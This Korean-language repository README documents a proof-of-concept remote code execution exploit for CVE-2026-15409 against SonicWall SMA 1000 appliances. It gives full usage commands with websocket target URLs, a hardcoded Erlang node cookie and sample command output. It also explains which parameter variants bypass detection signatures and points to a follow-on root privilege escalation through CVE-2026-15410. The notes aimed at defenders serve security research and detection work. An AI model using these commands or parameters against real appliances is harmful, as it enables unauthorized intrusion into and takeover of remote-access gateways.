CVE-2026-15409
이 저장소는 CVE-2026-15409에 대한 개념 증명 익스플로잇을 포함합니다. 이는 localhost:1050에서 예상되는 Erlang 프로토콜을 구현하고 이를 웹소켓을 통해 터널링하여 파일 읽기/쓰기 및 RPC 호출을 통한 임의 코드 실행을 가능하게 함으로써 SonicWall SMA 1000에서 비-root 원격 코드 실행을 수행합니다.
사용법
# python3 cve-2026-15409.py --ws-url 'wss://192.168.1.46/wsproxy?bmID=-3389c1b25ccd&serviceType=SSH&host=0.0.0.0&port=1050' --ws-user-agent 'SMA Connect Agent' --ws-insecure-tls --exec 'whoami && id && pwd && hostname'
Authenticated to [email protected]
Peer flags: 0xd07df7fbd
Peer creation: 1784069352
RPC os:cmd/1 => couchdb
uid=1010(couchdb) gid=1(daemon) groups=1(daemon)
/opt/couchdb
SMAAppliance.sma
익스플로잇 및 탐지 관련 참고 사항
- 이 익스플로잇은 WorkPlace 서비스(보통 443번 포트에서 수신)를 대상으로 하며, 거의 항상 활성화되어 있을 가능성이 높습니다(기본 AD와 같은 사용자 인증 방식 설정 필요).
- 2026년 6월 핫픽스(패치 직전 최신)가 적용된 ex_sra_vm_12.5.0-02002.ova를 대상으로 개발되었습니다.
- 예: python3 cve-2026-15409.py --ws-url 'wss://TARGET_IP_HERE/wsproxy?bmID=-3389c1b25ccd&serviceType=SSH&host=0.0.0.0&port=1050' --ws-user-agent 'SMA Connect Agent' --ws-insecure-tls --cookie 10ecad5b446e86864832904cd439b6b70262 --exec 'touch /var/tmp/remote_code_execution'
- 익스플로잇에 사용되는 Erlang 노드 쿠키는 대상 간에 일관되어야 하며, 테스트 결과 localhost:1050의 Erlang 프로세스에 하드코딩되어 있습니다.
- 임의의 bmID 값은 값이 "-3389"로 시작하는 한 일반적으로 작동해야 합니다. "serviceType=SSH"에 대한 서명을 작성하지 마십시오. TELNET과 같은 대안도 작동하기 때문입니다. 0.0.0.0은 다른 주소 형식으로도 교체할 수 있습니다.
- 1050번 포트는 익스플로잇 기법 중 하나일 뿐이며, 익스플로잇에 하드코딩된 요구 사항이 아닙니다. EITW는 8188번 포트도 대상으로 하는 것이 관찰되었지만, 1050을 사용하는 것이 더 쉬운 것으로 보입니다. 다른 포트의 다른 서비스도 익스플로잇될 수 있습니다. 실제 환경에서의 코드 실행은 사용된 기법의 변형으로 인해 couchdb가 아닌 다른 사용자 컨텍스트에서 발생할 가능성이 높습니다.
- 공격자는 셸을 획득한 후 "remove hotfix" xmlrpc traversal 익스플로잇 CVE-2026-15410(localhost:8188 대상)을 사용하여 root로 권한 상승할 수 있습니다.